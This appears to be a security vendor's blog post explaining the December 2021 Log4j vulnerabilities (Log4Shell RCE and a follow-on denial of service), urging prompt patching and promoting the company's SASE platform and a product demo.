In quick succession in December, The Apache Software Foundation released information on two critical vulnerabilities in its Log4j Java-based library.
The first vulnerability CVE-2021-44228, also known as Log4Shell or LogJam, was reported as an unauthenticated remote code execution (RCE) vulnerability. By exploiting how the library logs error messages, it could lead to a complete system takeover. Due to its critical nature and the ease of execution, it has received the highest possible Common Vulnerability Scoring System (CVSS) score of 10. The second vulnerability, CVE-2021-45046, was discovered shortly after the initial exploit was patched. It is rated 3.7 out of 10 on the CVSS and would lead to a denial of service (DOS).
At the time of writing, patches have been released to address both vulnerabilities.
Why should I care about Log4j?
Log4j is one of the most widely-used logging libraries in the world. Its adaptable logging capabilities make it useful across any type of infrastructure or application. Countless enterprise, government and open-source applications use Log4j. As a result, everyone has been rapidly patching their software since the vulnerabilities were announced.
Remote code execution (CVE-2021-44228)
The potential scope of the initial RCE vulnerability CVE-2021-44228 is astounding. Any device or app connected to the internet running Log4j versions 2.0-2.14.1, is at risk.
In addition, exploiting the vulnerability is relatively straightforward. By simply sending a malicious string that then gets logged by the application, attackers can exploit a feature in log4j that can be used to retrieve information.
In this case, attackers use the Java naming and Directory Interface (JNDI) to make an external network request for the malicious payload in the form of a Java file. From there, the attacker would be free to deliver whatever malware or backdoor entry to the infrastructure.
Denial of service (CVE-2021-45046)
The second vulnerability CVE-2021-45046 was uncovered shortly after the initial patch was released. According to the CVE description, the initial patch was “incomplete” and this new exploit “could allow attackers… to craft malicious input data using a JNDI lookup pattern resulting in a denial of service (DOS) attack.”
Key Action: Apply the latest patch as soon as possible
Update any server, app or resource that uses Log4j with the latest patch immediately. This patch includes coverage for both the latest DOS vulnerability and the original RCE vulnerability.
How SASE can help protect you against this type of risk
As soon as the proof of concept (PoC) exploit was released on Github, threat actors began actively scanning the internet for vulnerable assets. Lookout customers who use the Lookout Security Platform, our Secure Service Edge (SASE) solution, are equipped with several ways to protect their sensitive data and mitigate risks associated with this vulnerability.
Restrict access to private apps
To mitigate against the possibility of data exfiltration, organizations should restrict access to its apps running on Infrastructure-as-a-Service (IaaS) and on-premises data centers using Zero Trust Network Access (ZTNA). By implementing user-to-app segmentation with ZTNA, the apps are cloaked and not openly accessible via the internet. In addition, ZTNA limits the possibility of attackers using stolen credentials to access these resources, move laterally and discover sensitive data to exfiltrate.
Monitor user and app behaviors
Organizations should implement defense-in-depth strategies by closely monitoring both the user and app behaviors. By flagging behavior indicative of an exploit, such as an anomalous login location or unusual file download volume, you will be able to detect and respond to malicious activities across your cloud and on-prem infrastructure as well as your endpoint devices.
Encrypt sensitive data
Lookout SASE also has integrated enterprise digital rights management (E-DRM) to encrypt data so that only authorized users have access even if it’s passed around offline. Sensitive data is dynamically identified by data loss prevention (DLP) with exact data match (EDM) and optical character recognition (OCR), then classified as sensitive by Microsoft AIP and Titus. This enables you to build a number of data access and protection policies that apply to all cloud-based or on-premises data.
Monitor connected apps
Connected apps are third party apps that integrate via authorization tokens like OAuth or JSON Web Tokens with platforms such as Office 365, Google Workspace, and Salesforce. These apps remain mostly invisible but can still upload and download data from the platforms with which they’re integrated. Lookout SASE can discover and monitor connected apps for suspicious activities while also providing remediation, alerting, revocation of access, and blocking capabilities.
To get started on your SASE journey, download a complimentary copy of the 2021 Gartner Strategic Roadmap for SASE Convergence.
Book a personalized, no-pressure demo today to learn:
- How adversaries are leveraging avenues outside traditional email to conduct phishing on iOS and Android devices
- Real-world examples of phishing and app threats that have compromised organizations
- How an integrated endpoint-to-cloud security platform can detect threats and protect your organization